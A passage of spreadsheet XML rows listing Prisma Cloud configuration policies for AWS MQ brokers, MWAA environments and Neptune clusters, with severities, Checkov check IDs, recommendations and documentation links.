      <c r="D801" t="inlineStr"/>
      <c r="E801" t="inlineStr"/>
      <c r="F801" t="inlineStr"/>
      <c r="G801" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J801" t="inlineStr">
        <is>
          <t>IaC:General:aws-mq</t>
        </is>
      </c>
      <c r="K801" t="inlineStr">
        <is>
          <t>AWS MQBroker audit logging is disabled</t>
        </is>
      </c>
      <c r="L801" t="inlineStr"/>
      <c r="M801" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N801" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O801" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P801" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q801" t="inlineStr"/>
      <c r="R801" t="inlineStr"/>
      <c r="S801" t="inlineStr"/>
      <c r="T801" t="b">
        <v>0</v>
      </c>
      <c r="U801" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V801" t="inlineStr">
        <is>
          <t>IaC:General:aws-mq-broker</t>
        </is>
      </c>
      <c r="W801" t="inlineStr">
        <is>
          <t>Ensure MQ Broker Audit logging is enabled</t>
        </is>
      </c>
      <c r="X801" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbroker-audit-logging-is-enabled</t>
        </is>
      </c>
      <c r="Y801" t="inlineStr"/>
      <c r="Z801" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_mq_broker"]}</t>
        </is>
      </c>
      <c r="AA801" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB801" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC801" t="inlineStr">
        <is>
          <t>CKV_AWS_197</t>
        </is>
      </c>
      <c r="AD801" t="b">
        <v>1</v>
      </c>
      <c r="AE801" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF801" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>6cc22562-8bcd-4e12-8610-77e926cf4fa7</t>
        </is>
      </c>
      <c r="AI801" t="inlineStr"/>
      <c r="AJ801" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK801" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" t="inlineStr"/>
      <c r="B802" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C802" s="2" t="inlineStr"/>
      <c r="D802" t="inlineStr"/>
      <c r="E802" t="inlineStr"/>
      <c r="F802" t="inlineStr"/>
      <c r="G802" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J802" t="inlineStr">
        <is>
          <t>IaC:General:aws-mq</t>
        </is>
      </c>
      <c r="K802" t="inlineStr">
        <is>
          <t>AWS MQBroker's minor version updates are disabled</t>
        </is>
      </c>
      <c r="L802" t="inlineStr"/>
      <c r="M802" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N802" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O802" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P802" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q802" t="inlineStr"/>
      <c r="R802" t="inlineStr"/>
      <c r="S802" t="inlineStr"/>
      <c r="T802" t="b">
        <v>0</v>
      </c>
      <c r="U802" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V802" t="inlineStr">
        <is>
          <t>IaC:General:aws-mq-broker</t>
        </is>
      </c>
      <c r="W802" t="inlineStr">
        <is>
          <t>Ensure MQ Broker minor version updates are enabled</t>
        </is>
      </c>
      <c r="X802" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbrokers-minor-version-updates-are-enabled</t>
        </is>
      </c>
      <c r="Y802" t="inlineStr"/>
      <c r="Z802" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_mq_broker"]}</t>
        </is>
      </c>
      <c r="AA802" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB802" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC802" t="inlineStr">
        <is>
          <t>CKV_AWS_207</t>
        </is>
      </c>
      <c r="AD802" t="b">
        <v>1</v>
      </c>
      <c r="AE802" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF802" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>faa7d1ae-cb47-44b5-be1f-aa76e4a9c6a9</t>
        </is>
      </c>
      <c r="AI802" t="inlineStr"/>
      <c r="AJ802" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK802" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" t="inlineStr"/>
      <c r="B803" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C803" s="2" t="inlineStr"/>
      <c r="D803" t="inlineStr"/>
      <c r="E803" t="inlineStr"/>
      <c r="F803" t="inlineStr"/>
      <c r="G803" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J803" t="inlineStr">
        <is>
          <t>IaC:General:aws-mq</t>
        </is>
      </c>
      <c r="K803" t="inlineStr">
        <is>
          <t>AWS MQBroker version is not up to date</t>
        </is>
      </c>
      <c r="L803" t="inlineStr"/>
      <c r="M803" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N803" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O803" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P803" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q803" t="inlineStr"/>
      <c r="R803" t="inlineStr"/>
      <c r="S803" t="inlineStr"/>
      <c r="T803" t="b">
        <v>0</v>
      </c>
      <c r="U803" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V803" t="inlineStr">
        <is>
          <t>IaC:General:aws-mq-broker,aws-mq-configuration</t>
        </is>
      </c>
      <c r="W803" t="inlineStr">
        <is>
          <t>Ensure MQBroker version is current</t>
        </is>
      </c>
      <c r="X803" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbroker-version-is-up-to-date</t>
        </is>
      </c>
      <c r="Y803" t="inlineStr"/>
      <c r="Z803" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_mq_broker", "aws_mq_configuration"]}</t>
        </is>
      </c>
      <c r="AA803" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB803" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC803" t="inlineStr">
        <is>
          <t>CKV_AWS_208</t>
        </is>
      </c>
      <c r="AD803" t="b">
        <v>1</v>
      </c>
      <c r="AE803" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF803" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>675a6e60-cacf-4367-9a1d-9f56f5180861</t>
        </is>
      </c>
      <c r="AI803" t="inlineStr"/>
      <c r="AJ803" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK803" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" t="inlineStr"/>
      <c r="B804" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C804" s="2" t="inlineStr"/>
      <c r="D804" t="inlineStr"/>
      <c r="E804" t="inlineStr"/>
      <c r="F804" t="inlineStr"/>
      <c r="G804" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J804" t="inlineStr">
        <is>
          <t>IaC:General:aws-mwaa</t>
        </is>
      </c>
      <c r="K804" t="inlineStr">
        <is>
          <t>AWS MWAA environment has scheduler logs disabled</t>
        </is>
      </c>
      <c r="L804" t="inlineStr"/>
      <c r="M804" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N804" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O804" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P804" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q804" t="inlineStr"/>
      <c r="R804" t="inlineStr"/>
      <c r="S804" t="inlineStr"/>
      <c r="T804" t="b">
        <v>0</v>
      </c>
      <c r="U804" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V804" t="inlineStr">
        <is>
          <t>IaC:General:aws-mwaa-environment</t>
        </is>
      </c>
      <c r="W804" t="inlineStr">
        <is>
          <t>Ensure MWAA environment has scheduler logs enabled</t>
        </is>
      </c>
      <c r="X804" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-scheduler-logs-enabled</t>
        </is>
      </c>
      <c r="Y804" t="inlineStr"/>
      <c r="Z804" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_mwaa_environment"]}</t>
        </is>
      </c>
      <c r="AA804" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB804" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC804" t="inlineStr">
        <is>
          <t>CKV_AWS_242</t>
        </is>
      </c>
      <c r="AD804" t="b">
        <v>1</v>
      </c>
      <c r="AE804" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF804" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>c848bd8a-2bb2-4c0b-9c2c-2b445cfdb811</t>
        </is>
      </c>
      <c r="AI804" t="inlineStr"/>
      <c r="AJ804" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK804" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" t="inlineStr"/>
      <c r="B805" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C805" s="2" t="inlineStr"/>
      <c r="D805" t="inlineStr"/>
      <c r="E805" t="inlineStr"/>
      <c r="F805" t="inlineStr"/>
      <c r="G805" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J805" t="inlineStr">
        <is>
          <t>IaC:General:aws-mwaa</t>
        </is>
      </c>
      <c r="K805" t="inlineStr">
        <is>
          <t>AWS MWAA environment has worker logs disabled</t>
        </is>
      </c>
      <c r="L805" t="inlineStr"/>
      <c r="M805" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N805" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O805" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P805" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q805" t="inlineStr"/>
      <c r="R805" t="inlineStr"/>
      <c r="S805" t="inlineStr"/>
      <c r="T805" t="b">
        <v>0</v>
      </c>
      <c r="U805" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V805" t="inlineStr">
        <is>
          <t>IaC:General:aws-mwaa-environment</t>
        </is>
      </c>
      <c r="W805" t="inlineStr">
        <is>
          <t>Ensure MWAA environment has worker logs enabled</t>
        </is>
      </c>
      <c r="X805" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-worker-logs-enabled</t>
        </is>
      </c>
      <c r="Y805" t="inlineStr"/>
      <c r="Z805" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_mwaa_environment"]}</t>
        </is>
      </c>
      <c r="AA805" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB805" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC805" t="inlineStr">
        <is>
          <t>CKV_AWS_243</t>
        </is>
      </c>
      <c r="AD805" t="b">
        <v>1</v>
      </c>
      <c r="AE805" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF805" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>15ca455c-9e3d-4547-ab70-cb81b99af3c2</t>
        </is>
      </c>
      <c r="AI805" t="inlineStr"/>
      <c r="AJ805" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK805" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" t="inlineStr"/>
      <c r="B806" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C806" s="2" t="inlineStr"/>
      <c r="D806" t="inlineStr"/>
      <c r="E806" t="inlineStr"/>
      <c r="F806" t="inlineStr"/>
      <c r="G806" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J806" t="inlineStr">
        <is>
          <t>IaC:General:aws-mwaa</t>
        </is>
      </c>
      <c r="K806" t="inlineStr">
        <is>
          <t>AWS MWAA environment has webserver logs disabled</t>
        </is>
      </c>
      <c r="L806" t="inlineStr"/>
      <c r="M806" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N806" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O806" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P806" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q806" t="inlineStr"/>
      <c r="R806" t="inlineStr"/>
      <c r="S806" t="inlineStr"/>
      <c r="T806" t="b">
        <v>0</v>
      </c>
      <c r="U806" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V806" t="inlineStr">
        <is>
          <t>IaC:General:aws-mwaa-environment</t>
        </is>
      </c>
      <c r="W806" t="inlineStr">
        <is>
          <t>Ensure MWAA environment has webserver logs enabled</t>
        </is>
      </c>
      <c r="X806" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-webserver-logs-enabled</t>
        </is>
      </c>
      <c r="Y806" t="inlineStr"/>
      <c r="Z806" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_mwaa_environment"]}</t>
        </is>
      </c>
      <c r="AA806" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB806" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC806" t="inlineStr">
        <is>
          <t>CKV_AWS_244</t>
        </is>
      </c>
      <c r="AD806" t="b">
        <v>1</v>
      </c>
      <c r="AE806" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF806" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>1f508c33-c9e1-4ee8-9f52-21300c096aea</t>
        </is>
      </c>
      <c r="AI806" t="inlineStr"/>
      <c r="AJ806" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK806" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" t="inlineStr"/>
      <c r="B807" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C807" s="2" t="inlineStr"/>
      <c r="D807" t="inlineStr"/>
      <c r="E807" t="inlineStr"/>
      <c r="F807" t="inlineStr"/>
      <c r="G807" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J807" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune</t>
        </is>
      </c>
      <c r="K807" t="inlineStr">
        <is>
          <t>Neptune is not encrypted with KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="L807" t="inlineStr"/>
      <c r="M807" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N807" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O807" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P807" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q807" t="inlineStr"/>
      <c r="R807" t="inlineStr"/>
      <c r="S807" t="inlineStr"/>
      <c r="T807" t="b">
        <v>0</v>
      </c>
      <c r="U807" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V807" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune-cluster</t>
        </is>
      </c>
      <c r="W807" t="inlineStr">
        <is>
          <t>Ensure Neptune is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X807" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-347</t>
        </is>
      </c>
      <c r="Y807" t="inlineStr"/>
      <c r="Z807" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_neptune_cluster"]}</t>
        </is>
      </c>
      <c r="AA807" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB807" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC807" t="inlineStr">
        <is>
          <t>CKV_AWS_347</t>
        </is>
      </c>
      <c r="AD807" t="b">
        <v>1</v>
      </c>
      <c r="AE807" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF807" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>b3287f82-37f2-42f6-93aa-2943d0b77500</t>
        </is>
      </c>
      <c r="AI807" t="inlineStr"/>
      <c r="AJ807" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK807" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" t="inlineStr"/>
      <c r="B808" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C808" s="2" t="inlineStr"/>
      <c r="D808" t="inlineStr"/>
      <c r="E808" t="inlineStr"/>
      <c r="F808" t="inlineStr"/>
      <c r="G808" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J808" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune</t>
        </is>
      </c>
      <c r="K808" t="inlineStr">
        <is>
          <t>Neptune storage is not securely encrypted</t>
        </is>
      </c>
      <c r="L808" t="inlineStr"/>
      <c r="M808" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N808" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O808" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P808" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q808" t="inlineStr"/>
      <c r="R808" t="inlineStr"/>
      <c r="S808" t="inlineStr"/>
      <c r="T808" t="b">
        <v>0</v>
      </c>
      <c r="U808" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V808" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune-cluster</t>
        </is>
      </c>
      <c r="W808" t="inlineStr">
        <is>
          <t>Ensure Neptune storage is securely encrypted</t>
        </is>
      </c>
      <c r="X808" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-18</t>
        </is>
      </c>
      <c r="Y808" t="inlineStr"/>
      <c r="Z808" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_neptune_cluster"]}</t>
        </is>
      </c>
      <c r="AA808" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB808" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC808" t="inlineStr">
        <is>
          <t>CKV_AWS_44</t>
        </is>
      </c>
      <c r="AD808" t="b">
        <v>1</v>
      </c>
      <c r="AE808" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF808" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>8244ecf5-3dad-400a-ba71-3b5162ede0f7</t>
        </is>
      </c>
      <c r="AI808" t="inlineStr"/>
      <c r="AJ808" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK808" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" t="inlineStr"/>
      <c r="B809" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C809" s="2" t="inlineStr"/>
      <c r="D809" t="inlineStr"/>
      <c r="E809" t="inlineStr"/>
      <c r="F809" t="inlineStr"/>
      <c r="G809" t="b">
        <v>1</v>
      </c>
      <c r="H8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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J809" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune</t>
        </is>
      </c>
      <c r="K809" t="inlineStr">
        <is>
          <t>Clusters of Neptune DB do not replicate tags to snapshots</t>
        </is>
      </c>
      <c r="L809" t="inlineStr"/>
      <c r="M809" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N809" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O809" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P809" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q809" t="inlineStr"/>
      <c r="R809" t="inlineStr"/>
      <c r="S809" t="inlineStr"/>
      <c r="T809" t="b">
        <v>0</v>
      </c>
      <c r="U809" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V809" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune-cluster</t>
        </is>
      </c>
      <c r="W809" t="inlineStr">
        <is>
          <t>Neptune DB clusters should be configured to copy tags to snapshots</t>
        </is>
      </c>
      <c r="X809" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-362</t>
        </is>
      </c>
      <c r="Y809" t="inlineStr"/>
      <c r="Z809" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_neptune_cluster"]}</t>
        </is>
      </c>
      <c r="AA809" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB809" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC809" t="inlineStr">
        <is>
          <t>CKV_AWS_362</t>
        </is>
      </c>
      <c r="AD809" t="b">
        <v>1</v>
      </c>
      <c r="AE809" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF809" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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09" t="inlineStr">
        <is>
          <t>52cf3523-455a-4e5a-acc6-489381e876a3</t>
        </is>
      </c>
      <c r="AI809" t="inlineStr"/>
      <c r="AJ809" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK809" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" t="inlineStr"/>
      <c r="B810" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C810" s="2" t="inlineStr"/>
      <c r="D810" t="inlineStr"/>
      <c r="E810" t="inlineStr"/>
      <c r="F810" t="inlineStr"/>
      <c r="G810" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J810" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune</t>
        </is>
      </c>
      <c r="K810" t="inlineStr">
        <is>
          <t>Neptune cluster instance is publicly available</t>
        </is>
      </c>
      <c r="L810" t="inlineStr"/>
      <c r="M810" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N810" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O810" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P810" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q810" t="inlineStr"/>
      <c r="R810" t="inlineStr"/>
      <c r="S810" t="inlineStr"/>
      <c r="T810" t="b">
        <v>0</v>
      </c>
      <c r="U810" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V810" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune-cluster-instance</t>
        </is>
      </c>
      <c r="W810" t="inlineStr">
        <is>
          <t>Ensure Neptune Cluster instance is not publicly available</t>
        </is>
      </c>
      <c r="X810" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-42</t>
        </is>
      </c>
      <c r="Y810" t="inlineStr"/>
      <c r="Z810" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_neptune_cluster_instance"]}</t>
        </is>
      </c>
      <c r="AA810" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB810" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC810" t="inlineStr">
        <is>
          <t>CKV_AWS_102</t>
        </is>
      </c>
      <c r="AD810" t="b">
        <v>1</v>
      </c>
      <c r="AE810" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF810" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>60b324fc-fee3-4db3-8668-c23832ac5b7c</t>
        </is>
      </c>
      <c r="AI810" t="inlineStr"/>
      <c r="AJ810" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK810" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" t="inlineStr"/>
      <c r="B811" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C811" s="2" t="inlineStr"/>
      <c r="D811" t="inlineStr"/>
      <c r="E811" t="inlineStr"/>
      <c r="F811" t="inlineStr"/>
      <c r="G811" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J811" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune</t>
        </is>
      </c>
      <c r="K811" t="inlineStr">
        <is>
          <t>Neptune snapshot is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="L811" t="inlineStr"/>
      <c r="M811" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N811" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O811" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P811" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q811" t="inlineStr"/>
      <c r="R811" t="inlineStr"/>
      <c r="S811" t="inlineStr"/>
      <c r="T811" t="b">
        <v>0</v>
      </c>
      <c r="U811" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V811" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune-cluster-snapshot</t>
